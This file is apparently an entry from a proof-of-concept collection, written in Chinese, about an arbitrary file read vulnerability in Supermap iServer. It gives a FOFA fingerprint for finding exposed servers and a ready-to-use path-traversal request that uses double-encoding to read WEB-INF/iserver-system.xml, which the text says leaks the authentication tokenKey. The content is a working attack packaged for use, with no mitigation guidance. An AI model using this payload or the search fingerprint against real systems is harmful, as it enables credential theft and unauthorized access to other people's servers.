POC/wpoc/Supermap iServer/Supermap iServer任意文件读取漏洞.md

13 lines
369 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## Supermap iServer任意文件读取漏洞
## 漏洞描述
北京超图软件股份有限公司是聚焦地理信息软件和空间智能领域的基础软件与应用软件厂商Supermap iServer 存在文件读取漏洞攻击者可获取用于认证的tokenKey
## fofa
icon_hash="-1656662001"
## poc
```
/iserver/output/../WEB-IN%2546/iserver-system.xml
```